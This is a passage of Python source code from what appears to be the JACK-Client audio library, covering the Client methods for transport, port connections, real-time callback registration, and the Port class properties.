return _lib.jack_get_sample_rate(self._ptr)
@property
def blocksize(self):
"""The JACK block size (must be a power of two).
The current maximum size that will ever be passed to the process
callback. It should only be queried *before* `activate()` has
been called. This size may change, clients that depend on it
must register a callback with `set_blocksize_callback()` so they
will be notified if it does.
Changing the blocksize stops the JACK engine process cycle, then
calls all registered callback functions (see
`set_blocksize_callback()`) before restarting the process
cycle. This will cause a gap in the audio flow, so it should
only be done at appropriate stopping points.
"""
return _lib.jack_get_buffer_size(self._ptr)
@blocksize.setter
def blocksize(self, blocksize):
_check(_lib.jack_set_buffer_size(self._ptr, blocksize),
'Error setting JACK blocksize')
@property
def status(self):
"""JACK client status. See `Status`."""
return self._status
@property
def realtime(self):
"""Whether JACK is running with ``-R`` (``--realtime``)."""
return bool(_lib.jack_is_realtime(self._ptr))
@property
def frames_since_cycle_start(self):
"""Time since start of audio block.
The estimated time in frames that has passed since the JACK
server began the current process cycle.
"""
return _lib.jack_frames_since_cycle_start(self._ptr)
@property
def frame_time(self):
"""The estimated current time in frames.
This is intended for use in other threads (not the process
callback). The return value can be compared with the value of
`last_frame_time` to relate time in other threads to JACK time.
"""
return _lib.jack_frame_time(self._ptr)
@property
def last_frame_time(self):
"""The precise time at the start of the current process cycle.
This may only be used from the process callback (see
`set_process_callback()`), and can be used to interpret
timestamps generated by `frame_time` in other threads with
respect to the current process cycle.
This is the only jack time function that returns exact time:
when used during the process callback it always returns the same
value (until the next process callback, where it will return
that value + `blocksize`, etc). The return value is guaranteed
to be monotonic and linear in this fashion unless an xrun occurs
(see `set_xrun_callback()`). If an xrun occurs, clients must
check this value again, as time may have advanced in a
non-linear way (e.g. cycles may have been skipped).
"""
return _lib.jack_last_frame_time(self._ptr)
@property
def inports(self):
"""A list of audio input `Ports`.
New ports can be created and added to this list with
`inports.register() <Ports.register>`.
When :meth:`~OwnPort.unregister` is called on one of the items
in this list, this port is removed from the list.
`inports.clear() <Ports.clear>` can be used to unregister all
audio input ports at once.
See Also
--------
Ports, OwnPort
"""
return self._inports
@property
def outports(self):
"""A list of audio output :class:`Ports`.
New ports can be created and added to this list with
`outports.register() <Ports.register>`.
When :meth:`~OwnPort.unregister` is called on one of the items
in this list, this port is removed from the list.
`outports.clear() <Ports.clear>` can be used to unregister all
audio output ports at once.
See Also
--------
Ports, OwnPort
"""
return self._outports
@property
def midi_inports(self):
"""A list of MIDI input :class:`Ports`.
New MIDI ports can be created and added to this list with
`midi_inports.register() <Ports.register>`.
When :meth:`~OwnPort.unregister` is called on one of the items
in this list, this port is removed from the list.
`midi_inports.clear() <Ports.clear>` can be used to unregister
all MIDI input ports at once.
See Also
--------
Ports, OwnMidiPort
"""
return self._midi_inports
@property
def midi_outports(self):
"""A list of MIDI output :class:`Ports`.
New MIDI ports can be created and added to this list with
`midi_outports.register() <Ports.register>`.
When :meth:`~OwnPort.unregister` is called on one of the items
in this list, this port is removed from the list.
`midi_outports.clear() <Ports.clear>` can be used to unregister
all MIDI output ports at once.
See Also
--------
Ports, OwnMidiPort
"""
return self._midi_outports
def owns(self, port):
"""Check if a given port belongs to *self*.
Parameters
----------
port : str or Port
Full port name or `Port`, `MidiPort`, `OwnPort` or
`OwnMidiPort` object.
"""
port = self._get_port_ptr(port)
return bool(_lib.jack_port_is_mine(self._ptr, port))
def activate(self):
"""Activate JACK client.
Tell the JACK server that the program is ready to start
processing audio.
"""
_check(_lib.jack_activate(self._ptr), 'Error activating JACK client')
def deactivate(self, ignore_errors=True):
"""De-activate JACK client.
Tell the JACK server to remove *self* from the process graph.
Also, disconnect all ports belonging to it, since inactive
clients have no port connections.
"""
err = _lib.jack_deactivate(self._ptr)
if not ignore_errors:
_check(err, 'Error deactivating JACK client')
def cpu_load(self):
"""Return the current CPU load estimated by JACK.
This is a running average of the time it takes to execute a full
process cycle for all clients as a percentage of the real time
available per cycle determined by `blocksize` and `samplerate`.
"""
return _lib.jack_cpu_load(self._ptr)
def close(self, ignore_errors=True):
"""Close the JACK client."""
if self._ptr: |
def connect(self, source, destination):
"""Establish a connection between two ports.
When a connection exists, data written to the source port will
be available to be read at the destination port.
Audio ports can obviously not be connected with MIDI ports.
Parameters
----------
source : str or Port
One end of the connection. Must be an output port.
destination : str or Port
The other end of the connection. Must be an input port.
See Also
--------
OwnPort.connect, disconnect
"""
if isinstance(source, Port):
source = source.name
if isinstance(destination, Port):
destination = destination.name
err = _lib.jack_connect(self._ptr, source.encode(),
destination.encode())
if err == _errno.EEXIST:
raise JackError('Connection {0!r} -> {1!r} '
'already exists'.format(source, destination))
_check(err,
'Error connecting {0!r} -> {1!r}'.format(source, destination))
def disconnect(self, source, destination):
"""Remove a connection between two ports.
Parameters
----------
source, destination : str or Port
See `connect()`.
"""
if isinstance(source, Port):
source = source.name
if isinstance(destination, Port):
destination = destination.name
_check(_lib.jack_disconnect(
self._ptr, source.encode(), destination.encode()),
"Couldn't disconnect {0!r} -> {1!r}".format(source, destination))
def transport_start(self):
"""Start JACK transport."""
_lib.jack_transport_start(self._ptr)
def transport_stop(self):
"""Stop JACK transport."""
_lib.jack_transport_stop(self._ptr)
@property
def transport_state(self):
"""JACK transport state.
This is one of `STOPPED`, `ROLLING`, `STARTING`, `NETSTARTING`.
See Also
--------
transport_query
"""
return TransportState(_lib.jack_transport_query(self._ptr, _ffi.NULL))
@property
def transport_frame(self):
"""Get/set current JACK transport frame.
Return an estimate of the current transport frame, including any
time elapsed since the last transport positional update.
Assigning a frame number repositions the JACK transport.
"""
return _lib.jack_get_current_transport_frame(self._ptr)
@transport_frame.setter
def transport_frame(self, frame):
_check(_lib.jack_transport_locate(self._ptr, frame),
'Error locating JACK transport')
def transport_locate(self, frame):
"""
.. deprecated:: 0.4.1
Use `transport_frame` instead
"""
_warnings.warn(
'transport_locate() is deprecated, use transport_frame',
DeprecationWarning)
self.transport_frame = frame
def transport_query(self):
"""Query the current transport state and position.
This is a convenience function that does the same as
`transport_query_struct()`, but it only returns the valid fields
in an easy-to-use ``dict``.
Returns
-------
state : TransportState
The transport state can take following values:
`STOPPED`, `ROLLING`, `STARTING` and `NETSTARTING`.
position : dict
A dictionary containing only the valid fields of the
structure returned by `transport_query_struct()`.
See Also
--------
:attr:`transport_state`, transport_query_struct
"""
state, pos = self.transport_query_struct()
return TransportState(state), position2dict(pos)
def transport_query_struct(self):
"""Query the current transport state and position.
This function is realtime-safe, and can be called from any
thread. If called from the process thread, the returned
position corresponds to the first frame of the current cycle and
the state returned is valid for the entire cycle.
Returns
-------
state : int
The transport state can take following values: `STOPPED`,
`ROLLING`, `STARTING` and `NETSTARTING`.
position : jack_position_t
See the `JACK transport documentation`__ for the available
fields.
__ http://jackaudio.org/files/docs/html/
structjack__position__t.html
See Also
--------
transport_query, transport_reposition_struct
"""
state = _lib.jack_transport_query(self._ptr, self._position)
return state, self._position
def transport_reposition_struct(self, position):
"""Request a new transport position.
May be called at any time by any client. The new position takes
effect in two process cycles. If there are slow-sync clients
and the transport is already rolling, it will enter the
`STARTING` state and begin invoking their sync callbacks
(see `jack_set_sync_callback()`__) until ready.
This function is realtime-safe.
__ http://jackaudio.org/files/docs/html/group__TransportControl.html
Parameters
----------
position : jack_position_t
Requested new transport position. This is the same
structure as returned by `transport_query_struct()`.
See Also
--------
transport_query_struct, transport_locate
"""
_check(_lib.jack_transport_reposition(self._ptr, position),
'Error re-positioning transport')
def set_freewheel(self, onoff):
"""Start/Stop JACK's "freewheel" mode.
When in "freewheel" mode, JACK no longer waits for any external
event to begin the start of the next process cycle.
As a result, freewheel mode causes "faster than realtime"
execution of a JACK graph. If possessed, real-time scheduling is
dropped when entering freewheel mode, and if appropriate it is
reacquired when stopping.
IMPORTANT: on systems using capabilities to provide real-time
scheduling (i.e. Linux kernel 2.4), if onoff is zero, this
function must be called from the thread that originally called
`activate()`. This restriction does not apply to other systems
(e.g. Linux kernel 2.6 or OS X).
Parameters
----------
onoff : bool
If ``True``, freewheel mode starts. Otherwise freewheel mode
ends.
See Also
--------
set_freewheel_callback
"""
_check(_lib.jack_set_freewheel(self._ptr, onoff),
'Error setting freewheel mode')
def set_shutdown_callback(self, callback):
"""Register shutdown callback.
Register a function (and optional argument) to be called if and
when the JACK server shuts down the client thread.
The function must be written as if it were an asynchonrous POSIX
signal handler -- use only async-safe functions, and remember
that it is executed from another thread.
A typical function might set a flag or write to a pipe so that
the rest of the application knows that the JACK client thread
has shut down.
.. note:: Clients do not need to call this. It exists only to
help more complex clients understand what is going on. It
should be called before `activate()`.
Parameters
----------
callback : callable
User-supplied function that is called whenever the JACK
daemon is shutdown. It must have this signature::
callback(status: Status, reason: str) -> None
The argument *status* is of type `jack.Status`.
.. note:: The *callback* should typically signal another
thread to correctly finish cleanup by calling `close()`
(since it cannot be called directly in the context of the
thread that calls the shutdown callback).
After server shutdown, the client is *not* deallocated by
JACK, the user (that's you!) is responsible to properly
use `close()` to release client ressources.
Alternatively, the `Client` object can be used as a
*context manager* in a *with statement*, which takes care
of activating, deactivating and closing the client
automatically.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
"""
@self._callback('JackInfoShutdownCallback')
def callback_wrapper(code, reason, _):
callback(Status(code), _ffi.string(reason).decode())
_lib.jack_on_info_shutdown(self._ptr, callback_wrapper, _ffi.NULL)
def set_process_callback(self, callback):
"""Register process callback.
Tell the JACK server to call *callback* whenever there is work
be done.
The code in the supplied function must be suitable for real-time
execution. That means that it cannot call functions that might
block for a long time. This includes malloc, free, printf,
pthread_mutex_lock, sleep, wait, poll, select, pthread_join,
pthread_cond_wait, etc, etc.
.. warning:: Most Python interpreters use a `global interpreter
lock (GIL)`__, which violates the above real-time
requirement. Furthermore, Python's `garbage collector`__
might become active at an inconvenient time and block the
process callback for some time.
Because of this, Python is not really suitable for real-time
processing. If you want to implement a *reliable* real-time
audio/MIDI application, you should use a different
programming language, such as C or C++.
If you can live with some random audio drop-outs now and
then, feel free to continue using Python!
__ https://en.wikipedia.org/wiki/Global_Interpreter_Lock
__ https://en.wikipedia.org/wiki/Garbage_collection_(computer_science)
.. note:: This function cannot be called while the client is
activated (after `activate()` has been called).
Parameters
----------
callback : callable
User-supplied function that is called by the engine anytime
there is work to be done. It must have this signature::
callback(frames: int) -> None
The argument *frames* specifies the number of frames that
have to be processed in the current audio block.
It will be the same number as `blocksize` and it will be a
power of two.
As long as the client is active, the *callback* will be
called once in each process cycle. However, if an exception
is raised inside of a *callback*, it will not be called
anymore. The exception `CallbackExit` can be used to
silently prevent further callback invocations, all other
exceptions will print an error message to *stderr*.
"""
@self._callback('JackProcessCallback', error=_FAILURE)
def callback_wrapper(frames, _):
try:
callback(frames)
except CallbackExit:
return _FAILURE
return _SUCCESS
_check(_lib.jack_set_process_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting process callback')
def set_freewheel_callback(self, callback):
"""Register freewheel callback.
Tell the JACK server to call *callback* whenever we enter or
leave "freewheel" mode.
The argument to the callback will be ``True`` if JACK is
entering freewheel mode, and ``False`` otherwise.
All "notification events" are received in a separated non RT
thread, the code in the supplied function does not need to be
suitable for real-time execution.
.. note:: This function cannot be called while the client is
activated (after `activate()` has been called).
Parameters
----------
callback : callable
User-supplied function that is called whenever JACK starts
or stops freewheeling. It must have this signature::
callback(starting: bool) -> None
The argument *starting* is ``True`` if we start to
freewheel, ``False`` otherwise.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
See Also
--------
set_freewheel
"""
@self._callback('JackFreewheelCallback')
def callback_wrapper(starting, _):
callback(bool(starting))
_check(_lib.jack_set_freewheel_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting freewheel callback')
def set_blocksize_callback(self, callback):
"""Register blocksize callback.
Tell JACK to call *callback* whenever the size of the the buffer
that will be passed to the process callback is about to change.
Clients that depend on knowing the buffer size must supply a
*callback* before activating themselves.
All "notification events" are received in a separated non RT
thread, the code in the supplied function does not need to be
suitable for real-time execution.
.. note:: This function cannot be called while the client is
activated (after `activate()` has been called).
Parameters
----------
callback : callable
User-supplied function that is invoked whenever the JACK
engine buffer size changes. It must have this signature::
callback(blocksize: int) -> None
The argument *blocksize* is the new buffer size.
The *callback* is supposed to raise `CallbackExit` on error.
.. note:: Although this function is called in the JACK
process thread, the normal process cycle is suspended
during its operation, causing a gap in the audio flow.
So, the *callback* can allocate storage, touch memory not
previously referenced, and perform other operations that
are not realtime safe.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
See Also
--------
:attr:`blocksize`
"""
@self._callback('JackBufferSizeCallback', error=_FAILURE)
def callback_wrapper(blocksize, _):
try:
callback(blocksize)
except CallbackExit:
return _FAILURE
return _SUCCESS
_check(_lib.jack_set_buffer_size_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting blocksize callback')
def set_samplerate_callback(self, callback):
"""Register samplerate callback.
Tell the JACK server to call *callback* whenever the system
sample rate changes.
All "notification events" are received in a separated non RT
thread, the code in the supplied function does not need to be
suitable for real-time execution.
.. note:: This function cannot be called while the client is
activated (after `activate()` has been called).
Parameters
----------
callback : callable
User-supplied function that is called when the engine sample
rate changes. It must have this signature::
callback(samplerate: int) -> None
The argument *samplerate* is the new engine sample rate.
The *callback* is supposed to raise `CallbackExit` on error.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
See Also
--------
:attr:`samplerate`
"""
@self._callback('JackSampleRateCallback', error=_FAILURE)
def callback_wrapper(samplerate, _):
try:
callback(samplerate)
except CallbackExit:
return _FAILURE
return _SUCCESS
_check(_lib.jack_set_sample_rate_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting samplerate callback')
def set_client_registration_callback(self, callback):
"""Register client registration callback.
Tell the JACK server to call *callback* whenever a client is
registered or unregistered.
All "notification events" are received in a separated non RT
thread, the code in the supplied function does not need to be
suitable for real-time execution.
.. note:: This function cannot be called while the client is
activated (after `activate()` has been called).
Parameters
----------
callback : callable
User-supplied function that is called whenever a client is
registered or unregistered. It must have this signature::
callback(name: str, register: bool) -> None
The first argument contains the client name, the second
argument is ``True`` if the client is being registered and
``False`` if the client is being unregistered.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
"""
@self._callback('JackClientRegistrationCallback')
def callback_wrapper(name, register, _):
callback(_ffi.string(name).decode(), bool(register))
_check(_lib.jack_set_client_registration_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting client registration callback')
def set_port_registration_callback(self, callback=None,
only_available=True):
"""Register port registration callback.
Tell the JACK server to call *callback* whenever a port is
registered or unregistered.
All "notification events" are received in a separated non RT
thread, the code in the supplied function does not need to be
suitable for real-time execution.
.. note:: This function cannot be called while the client is
activated (after `activate()` has been called).
.. note:: Due to JACK 1 behavior, it is not possible to get
the pointer to an unregistering JACK Port if it already
existed before `activate()` was called. This will cause
the callback not to be called if *only_available* is
``True``, or called with ``None`` as first argument (see
below).
To avoid this, call `Client.get_ports()` just after
`activate()`, allowing the module to store pointers to
already existing ports and always receive a `Port`
argument for this callback.
Parameters
----------
callback : callable
User-supplied function that is called whenever a port is
registered or unregistered. It must have this signature::
callback(port: Port, register: bool) -> None
The first argument is a `Port`, `MidiPort`, `OwnPort` or
`OwnMidiPort` object, the second argument is ``True`` if the
port is being registered, ``False`` if the port is being
unregistered.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
only_available : bool, optional
If ``True``, the *callback* is not called if the port in
question is not available anymore (after another JACK client
has unregistered it).
If ``False``, it is called nonetheless, but the first
argument of the *callback* will be ``None`` if the port is
not available anymore.
See Also
--------
Ports.register
"""
if callback is None:
return lambda cb: self.set_port_registration_callback(
cb, only_available)
@self._callback('JackPortRegistrationCallback')
def callback_wrapper(port_id, register, _):
port_ptr = _lib.jack_port_by_id(self._ptr, port_id)
if port_ptr:
port = self._wrap_port_ptr(port_ptr)
elif only_available:
return
else:
port = None
callback(port, bool(register))
_check(_lib.jack_set_port_registration_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting port registration callback')
def set_port_connect_callback(self, callback=None, only_available=True):
"""Register port connect callback.
Tell the JACK server to call *callback* whenever a port is
connected or disconnected.
All "notification events" are received in a separated non RT
thread, the code in the supplied function does not need to be
suitable for real-time execution.
.. note:: This function cannot be called while the client is
activated (after `activate()` has been called).
.. note:: Due to JACK 1 behavior, it is not possible to get
the pointer to an unregistering JACK Port if it already
existed before `activate()` was called. This will cause
the callback not to be called if *only_available* is
``True``, or called with ``None`` as first argument (see
below).
To avoid this, call `Client.get_ports()` just after
`activate()`, allowing the module to store pointers to
already existing ports and always receive a `Port`
argument for this callback.
Parameters
----------
callback : callable
User-supplied function that is called whenever a port is
connected or disconnected. It must have this signature::
callback(a: Port, b: Port, connect: bool) -> None
The first and second arguments contain `Port`, `MidiPort`,
`OwnPort` or `OwnMidiPort` objects of the ports which are
connected or disconnected. The third argument is ``True``
if the ports were connected and ``False`` if the ports were
disconnected.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
only_available : bool, optional
See `set_port_registration_callback()`.
If ``False``, the first and/or the second argument to the
*callback* may be ``None``.
See Also
--------
Client.connect, OwnPort.connect
"""
if callback is None:
return lambda cb: self.set_port_connect_callback(
cb, only_available)
@self._callback('JackPortConnectCallback')
def callback_wrapper(a, b, connect, _):
port_ids = a, b
ports = [None, None]
for idx in 0, 1:
ptr = _lib.jack_port_by_id(self._ptr, port_ids[idx])
if ptr:
ports[idx] = self._wrap_port_ptr(ptr)
elif only_available:
return
else:
pass # Do nothing, port is already None
callback(ports[0], ports[1], bool(connect))
_check(_lib.jack_set_port_connect_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting port connect callback')
def set_port_rename_callback(self, callback=None, only_available=True):
"""Register port rename callback.
Tell the JACK server to call *callback* whenever a port is
renamed.
All "notification events" are received in a separated non RT
thread, the code in the supplied function does not need to be
suitable for real-time execution.
.. note:: This function cannot be called while the client is
activated (after `activate()` has been called).
Parameters
----------
callback : callable
User-supplied function that is called whenever the port name
has been changed. It must have this signature::
callback(port: Port, old: str, new: str) -> None
The first argument is the port that has been renamed (a
`Port`, `MidiPort`, `OwnPort` or `OwnMidiPort` object); the
second and third argument is the old and new name,
respectively. The *callback* is supposed to raise
`CallbackExit` on error.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
only_available : bool, optional
See `set_port_registration_callback()`.
See Also
--------
:attr:`Port.shortname`
Notes
-----
The port rename callback is not available in JACK 1!
See `this mailing list posting`__ and `this commit message`__.
__ http://comments.gmane.org/gmane.comp.audio.jackit/28888
__ https://github.com/jackaudio/jack1/commit/
94c819accfab2612050e875c24cf325daa0fd26d
"""
if callback is None:
return lambda cb: self.set_port_rename_callback(cb, only_available)
@self._callback('JackPortRenameCallback', error=_FAILURE)
def callback_wrapper(port_id, old_name, new_name, _):
port_ptr = _lib.jack_port_by_id(self._ptr, port_id)
if port_ptr:
port = self._wrap_port_ptr(port_ptr)
elif only_available:
return
else:
port = None
try:
callback(port, _ffi.string(old_name).decode(),
_ffi.string(new_name).decode())
except CallbackExit:
return _FAILURE
return _SUCCESS
_check(_lib.jack_set_port_rename_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting port rename callback')
def set_graph_order_callback(self, callback):
"""Register graph order callback.
Tell the JACK server to call *callback* whenever the processing
graph is reordered.
All "notification events" are received in a separated non RT
thread, the code in the supplied function does not need to be
suitable for real-time execution.
.. note:: This function cannot be called while the client is
activated (after :meth:`activate` has been called).
Parameters
----------
callback : callable
User-supplied function that is called whenever the
processing graph is reordered.
It must have this signature::
callback() -> None
The *callback* is supposed to raise `CallbackExit` on error.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
"""
@self._callback('JackGraphOrderCallback', error=_FAILURE)
def callback_wrapper(_):
try:
callback()
except CallbackExit:
return _FAILURE
return _SUCCESS
_check(_lib.jack_set_graph_order_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting graph order callback')
def set_xrun_callback(self, callback):
"""Register xrun callback.
Tell the JACK server to call *callback* whenever there is an
xrun.
All "notification events" are received in a separated non RT
thread, the code in the supplied function does not need to be
suitable for real-time execution.
.. note:: This function cannot be called while the client is
activated (after `activate()` has been called).
Parameters
----------
callback : callable
User-supplied function that is called whenever an xrun has
occured. It must have this signature::
callback(delayed_usecs: float) -> None
The callback argument is the delay in microseconds due to
the most recent XRUN occurrence.
The *callback* is supposed to raise `CallbackExit` on error.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
"""
@self._callback('JackXRunCallback', error=_FAILURE)
def callback_wrapper(_):
try:
callback(_lib.jack_get_xrun_delayed_usecs(self._ptr))
except CallbackExit:
return _FAILURE
return _SUCCESS
_check(_lib.jack_set_xrun_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting xrun callback')
def set_timebase_callback(self, callback=None, conditional=False):
"""Register as timebase master for the JACK subsystem.
The timebase master registers a callback that updates extended
position information such as beats or timecode whenever
necessary. Without this extended information, there is no need
for this function.
There is never more than one master at a time. When a new
client takes over, the former callback is no longer called.
Taking over the timebase may be done conditionally, so that
*callback* is not registered if there was a master already.
Parameters
----------
callback : callable
Realtime function that returns extended position
information. Its output affects all of the following
process cycle. This realtime function must not wait.
It is called immediately after the process callback (see
`set_process_callback()`) in the same thread whenever the
transport is rolling, or when any client has requested a new
position in the previous cycle. The first cycle after
`set_timebase_callback()` is also treated as a new position,
or the first cycle after `activate()` if the client had been
inactive. The *callback* must have this signature::
callback(state: int, blocksize: int, pos: jack_position_t, new_pos: bool) -> None
state
The current transport state. See `transport_state`.
blocksize
The number of frames in the current period.
See `blocksize`.
pos
The position structure for the next cycle; ``pos.frame``
will be its frame number. If *new_pos* is ``False``,
this structure contains extended position information
from the current cycle. If *new_pos* is ``True``, it
contains whatever was set by the requester.
The *callback*'s task is to update the extended
information here. See `transport_query_struct()`
for details about ``jack_position_t``.
new_pos
``True`` for a newly requested *pos*, or for the first
cycle after the timebase callback is defined.
.. note:: The *pos* argument must not be used to set
``pos.frame``. To change position, use
`transport_reposition_struct()` or `transport_locate()`.
These functions are realtime-safe, the timebase callback
can call them directly.
conditional : bool
Set to ``True`` for a conditional request.
Returns
-------
bool
``True`` if the timebase callback was registered.
``False`` if a conditional request failed because another
timebase master is already registered.
"""
if callback is None:
return lambda cb: self.set_timebase_callback(cb, conditional)
@self._callback('JackTimebaseCallback')
def callback_wrapper(state, blocksize, pos, new_pos, _):
callback(state, blocksize, pos, bool(new_pos))
err = _lib.jack_set_timebase_callback(self._ptr, conditional,
callback_wrapper, _ffi.NULL)
# Because of a bug in JACK2 version <= 1.9.10, we also check for -1.
# See https://github.com/jackaudio/jack2/pull/123
if conditional and err in (_errno.EBUSY, -1):
return False
_check(err, 'Error setting timebase callback')
return True
def get_uuid_for_client_name(self, name):
"""Get the session ID for a client name.
The session manager needs this to reassociate a client name to
the session ID.
"""
uuid = _ffi.gc(_lib.jack_get_uuid_for_client_name(
self._ptr, name.encode()), _lib.jack_free)
if not uuid:
raise JackError('Unable to get session ID for {0!r}'.format(name))
return _ffi.string(uuid).decode()
def get_client_name_by_uuid(self, uuid):
"""Get the client name for a session ID.
In order to snapshot the graph connections, the session manager
needs to map session IDs to client names.
"""
name = _ffi.gc(_lib.jack_get_client_name_by_uuid(
self._ptr, uuid.encode()), _lib.jack_free)
if not name:
raise JackError('Unable to get client name for {0!r}'.format(uuid))
return _ffi.string(name).decode()
def get_port_by_name(self, name):
"""Get port by name.
Given a full port name, this returns a `Port`, `MidiPort`,
`OwnPort` or `OwnMidiPort` object.
"""
port_ptr = _lib.jack_port_by_name(self._ptr, name.encode())
if not port_ptr:
raise JackError('Port {0!r} not available'.format(name))
return self._wrap_port_ptr(port_ptr)
def get_all_connections(self, port):
"""Return a list of ports which the given port is connected to.
This differs from `OwnPort.connections` (also available on
`OwnMidiPort`) in two important respects:
1) You may not call this function from code that is executed in
response to a JACK event. For example, you cannot use it in a
graph order callback.
2) You need not be the owner of the port to get information
about its connections.
"""
port = self._get_port_ptr(port)
names = _ffi.gc(_lib.jack_port_get_all_connections(self._ptr, port),
_lib.jack_free)
return self._port_list_from_pointers(names)
def get_ports(self, name_pattern='', is_audio=False, is_midi=False,
is_input=False, is_output=False, is_physical=False,
can_monitor=False, is_terminal=False):
"""Return a list of selected ports.
Parameters
----------
name_pattern : str
A regular expression used to select ports by name. If
empty, no selection based on name will be carried out.
is_audio, is_midi : bool
Select audio/MIDI ports. If neither of them is ``True``,
both types of ports are selected.
is_input, is_output, is_physical, can_monitor, is_terminal : bool
Select ports by their flags. If none of them are ``True``,
no selection based on flags will be carried out.
Returns
-------
list of Port/MidiPort/OwnPort/OwnMidiPort
All ports that satisfy the given conditions.
"""
if is_audio and not is_midi:
type_pattern = _AUDIO
elif is_midi and not is_audio:
type_pattern = _MIDI
else:
type_pattern = b''
flags = 0x0
if is_input:
flags |= _lib.JackPortIsInput
if is_output:
flags |= _lib.JackPortIsOutput
if is_physical:
flags |= _lib.JackPortIsPhysical
if can_monitor:
flags |= _lib.JackPortCanMonitor
if is_terminal:
flags |= _lib.JackPortIsTerminal
names = _ffi.gc(_lib.jack_get_ports(
self._ptr, name_pattern.encode(), type_pattern, flags),
_lib.jack_free)
return self._port_list_from_pointers(names)
def _callback(self, cdecl, **kwargs):
"""Wrapper for ffi.callback() that keeps callback alive."""
def callback_decorator(python_callable):
function_ptr = _ffi.callback(cdecl, python_callable, **kwargs)
self._keepalive.append(function_ptr)
return function_ptr
return callback_decorator
def _register_port(self, name, porttype, is_terminal, is_physical, flags):
"""Create a new port."""
if is_terminal:
flags |= _lib.JackPortIsTerminal
if is_physical:
flags |= _lib.JackPortIsPhysical
port_ptr = _lib.jack_port_register(self._ptr, name.encode(), porttype,
flags, 0)
if not port_ptr:
raise JackError(
'{0!r}: port registration failed'.format(name))
return self._wrap_port_ptr(port_ptr)
def _port_list_from_pointers(self, names):
"""Get list of Port objects from char**."""
ports = []
if names:
idx = 0
while True:
name = names[idx]
if not name:
break
ports.append(self.get_port_by_name(_ffi.string(name).decode()))
idx += 1
return ports
def _get_port_ptr(self, port):
"""Get port pointer from Port object or string or port pointer."""
if isinstance(port, Port):
port = port._ptr
elif isinstance(port, str):
port = self.get_port_by_name(port)._ptr
return port
def _wrap_port_ptr(self, ptr):
"""Create appropriate port object for a given port pointer."""
porttype = _ffi.string(_lib.jack_port_type(ptr))
if porttype == _AUDIO:
port = OwnPort(ptr, self) if self.owns(ptr) else Port(ptr)
elif porttype == _MIDI:
port = OwnMidiPort(ptr, self) if self.owns(ptr) else MidiPort(ptr)
else:
assert False
return port
class Port(object):
"""A JACK audio port.
This class cannot be instantiated directly. Instead, instances of
this class are returned from `Client.get_port_by_name()`,
`Client.get_ports()`, `Client.get_all_connections()` and
`OwnPort.connections`.
In addition, instances of this class are available in the callbacks
which are set with `Client.set_port_registration_callback()`,
`Client.set_port_connect_callback()` or
`Client.set_port_rename_callback`.
Note, however, that if the used `Client` owns the respective port,
instances of `OwnPort` (instead of `Port`) will be created. In case
of MIDI ports, instances of `MidiPort` or `OwnMidiPort` are created.
Besides being the type of non-owned JACK audio ports, this class
also serves as base class for all other port classes (`OwnPort`,
`MidiPort` and `OwnMidiPort`).
New JACK audio/MIDI ports can be created with the
:meth:`~Ports.register` method of `Client.inports`,
`Client.outports`, `Client.midi_inports` and `Client.midi_outports`.
"""
def __init__(self, port_ptr):
self._ptr = port_ptr
def __repr__(self):
return "jack.{0.__class__.__name__}('{0.name}')".format(self)
def __eq__(self, other):
"""Ports are equal if their underlying port pointers are."""
return self._ptr == other._ptr
def __ne__(self, other):
"""This should be implemented whenever __eq__() is implemented."""
return not self.__eq__(other)
@property
def name(self):
"""Full name of the JACK port (read-only)."""
return _ffi.string(_lib.jack_port_name(self._ptr)).decode()
@property
def shortname(self):
"""Short name of the JACK port, not including the client name.
Must be unique among all ports owned by a client.
May be modified at any time. If the resulting full name
(including the ``client_name:`` prefix) is longer than
`port_name_size()`, it will be truncated.
"""
return _ffi.string(_lib.jack_port_short_name(self._ptr)).decode()
@shortname.setter
def shortname(self, shortname):
_check(_lib.jack_port_set_name(self._ptr, shortname.encode()),
'Error setting port name')
@property
def aliases(self):
"""Returns a list of strings with the aliases for the JACK port."""
ctype = "char[{}]".format(_lib.jack_port_name_size())
aliases = [_ffi.new(ctype), _ffi.new(ctype)]
aliasesptr = _ffi.new("char *[]", aliases)
result = []
if _lib.jack_port_get_aliases(self._ptr, aliasesptr) > 0:
for i in 0, 1:
alias = _ffi.string(aliases[i]).decode()
if alias:
result.append(alias)
return result
def set_alias(self, alias):
"""Set an alias for the JACK port.
Ports can have up to two aliases. If both are already set,
this function will return an error.
"""
_check(_lib.jack_port_set_alias(self._ptr, alias.encode()),
'Error setting port alias')
def unset_alias(self, alias):
"""Remove an alias for the JACK port.
If the alias doesn't exist this function will return an error.
"""
_check(_lib.jack_port_unset_alias(self._ptr, alias.encode()),
'Error unsetting port alias')
@property
def uuid(self):
"""The UUID of the JACK port."""
return _lib.jack_port_uuid(self._ptr)
is_audio = property(lambda self: True, doc='This is always ``True``.')
is_midi = property(lambda self: False, doc='This is always ``False``.')
@property
def is_input(self):
"""Can the port receive data?"""
return self._hasflag(_lib.JackPortIsInput)
@property
def is_output(self):
"""Can data be read from this port?"""
return self._hasflag(_lib.JackPortIsOutput)
@property
def is_physical(self):
"""Does it correspond to some kind of physical I/O connector?"""
return self._hasflag(_lib.JackPortIsPhysical)
@property
def can_monitor(self):
"""Does a call to `request_monitor()` make sense?"""
return self._hasflag(_lib.JackPortCanMonitor)
@property
def is_terminal(self):
"""Is the data consumed/generated?"""
